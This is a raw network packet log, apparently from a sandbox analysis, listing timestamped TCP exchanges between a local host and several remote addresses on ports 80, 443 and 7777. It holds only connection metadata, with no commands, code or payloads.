Dec 14, 2024 23:58:37.510884047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.510895967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.510929108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.511579037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.511611938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.511636019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.511646032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.511667967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.511691093 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.512335062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.512368917 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.512392044 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.512402058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.512412071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.512439013 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.512453079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.512490988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.513077974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.513112068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.513142109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.513163090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.513537884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.513571978 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.513602018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.513628006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.514703989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.514756918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.514868975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.514921904 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.519283056 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.519345999 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.519387007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.519414902 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.519437075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.519464016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.550412893 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:37.654649019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.654768944 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.654820919 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.654887915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.655122995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.655191898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.655261993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.655324936 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.655463934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.655524969 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.656275034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.656331062 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.656413078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.656470060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.657289982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.657350063 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.657434940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.657485008 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.658288002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.658343077 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.658423901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.658471107 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.659306049 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.659362078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.659455061 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.659506083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.660336971 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.660402060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.660473108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.660526037 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.661364079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.661423922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.661859035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.661916018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.662353039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.662408113 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.662499905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.662556887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.663362980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.663413048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.663491964 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.663547039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.664392948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.664455891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.664540052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.664589882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.665406942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.665467024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.665546894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.665599108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.666450024 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.666507006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.666644096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.666692972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.667428970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.667485952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.667565107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.667614937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.668468952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.668529034 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.668607950 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.668658972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.669472933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.669527054 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.669606924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.669656992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.670485020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.670540094 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.670605898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.670653105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.671494007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.671544075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.671626091 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.671674967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.672492027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.672544003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.672612906 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.672683001 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.673521042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.673569918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.673645973 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.673693895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.674542904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.674592018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.674683094 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.674735069 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.675555944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.675605059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.675679922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.675724030 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.676599979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.676656008 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.676731110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.676776886 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.677603960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.677664042 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.677728891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.677781105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.678603888 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.678658009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.678735018 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.678782940 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.679621935 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.679680109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.679754019 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.679805040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.680629969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.680679083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.680752039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.680800915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.681627989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.681682110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.681761026 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.681816101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.682651043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.682703018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.682780981 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.682833910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.683682919 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.683737040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.683811903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.683856964 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.684698105 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.684751987 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.684833050 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.684885025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.685719967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.685766935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.685846090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.685911894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.686717033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.686770916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.686849117 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.686892033 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.687746048 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.687804937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.687879086 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.687937021 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.688755989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.688811064 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.688899040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.688951015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.689765930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.689817905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.689951897 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.690000057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.690077066 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:37.690788031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.690850019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.690934896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.690984964 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.691803932 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.691859007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.691934109 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.691983938 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.692830086 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.692883015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.692955017 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.692992926 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.693880081 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.693937063 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.694103003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.694149971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.694859028 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.694900036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.694982052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.695024014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.695936918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.695985079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.696058989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.696105003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.696923018 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.697010040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.697067976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.697122097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.697925091 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.697978020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.698113918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.698165894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.698900938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.698954105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.699033022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.699076891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.699922085 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.699970007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.700047970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.700107098 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.700942039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.700994968 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.701061010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.701106071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.701953888 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.702004910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.702136993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.702184916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.702966928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.703022957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.703103065 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.703154087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.704014063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.704072952 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.704148054 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.704190969 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.705013990 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.705060005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.705135107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.705200911 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.706057072 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.706110001 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.706150055 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.706196070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.707061052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.707114935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.707164049 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.707207918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.739139080 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:37.802081108 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:37.802310944 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:37.802419901 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:37.803491116 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:37.803509951 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:37.803595066 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:37.803602934 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:37.806010962 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:37.806058884 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:37.806273937 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:37.806514025 CET	49848	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:37.806529045 CET	443	49848	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:37.846738100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.846784115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.846803904 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.846822023 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.846827984 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.846925974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.846971035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.847242117 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.847892046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.847942114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.848020077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.848077059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.848881006 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.848941088 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.849031925 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.849081039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.849872112 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.849921942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.850012064 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.850058079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.850923061 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.850975990 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.851025105 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.851074934 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.851897001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.851962090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.852029085 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.852098942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.852916002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.852962971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.853053093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.853100061 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.853928089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.854079008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.854088068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.854127884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.854962111 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.855021000 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.855088949 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.855138063 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.855990887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.856045961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.856097937 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.856142998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.857028008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.857095957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.857150078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.857196093 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.858031988 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.858078003 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.858165979 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.858216047 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.859035969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.859083891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.859152079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.859217882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.860053062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.860100985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.860168934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.860234022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.861056089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.861130953 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.861196041 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.861275911 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.862050056 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.862098932 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.862179995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.862229109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.863065004 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.863123894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.863189936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.863441944 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.864105940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.864167929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.864242077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.864377975 CET	49841	80	192.168.2.4	185.215.113.16
